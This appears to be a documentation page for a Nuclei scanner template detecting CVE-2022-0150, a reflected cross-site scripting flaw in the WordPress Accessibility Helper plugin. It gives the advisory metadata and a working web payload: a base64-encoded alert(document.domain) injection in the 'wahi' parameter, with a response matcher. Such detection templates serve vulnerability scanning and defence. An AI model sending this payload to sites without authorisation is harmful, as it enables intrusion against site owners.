WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting
ID: CVE-2022-0150
Severity: medium
Author: dhiyaneshDK
Tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,xss,wp_accessibility_helper_project
Description
Section titled “Description”WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.
YAML Source
Section titled “YAML Source”id: CVE-2022-0150
info: name: WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting author: dhiyaneshDK severity: medium description: | WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page. impact: | Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or defacement of the affected WordPress website. remediation: | Update to WordPress Accessibility Helper version 0.6.0.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 - https://plugins.trac.wordpress.org/changeset/2661008 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.41295 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: wp_accessibility_helper_project product: wp_accessibility_helper framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,xss,wp_accessibility_helper_project
http: - method: GET path: - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
matchers-condition: and matchers: - type: word part: body words: - "var wah_target_src = '';alert(document.domain);//';"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100962b2c63148f9dce34e35c6335c88dc94d5fae40be0700ce0adae2ca4b885b8d022027bbfa9dead7026bc9d45ac13d5cb90822273727c2999d7ddb2f50e5ffa0db32:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0150.yaml"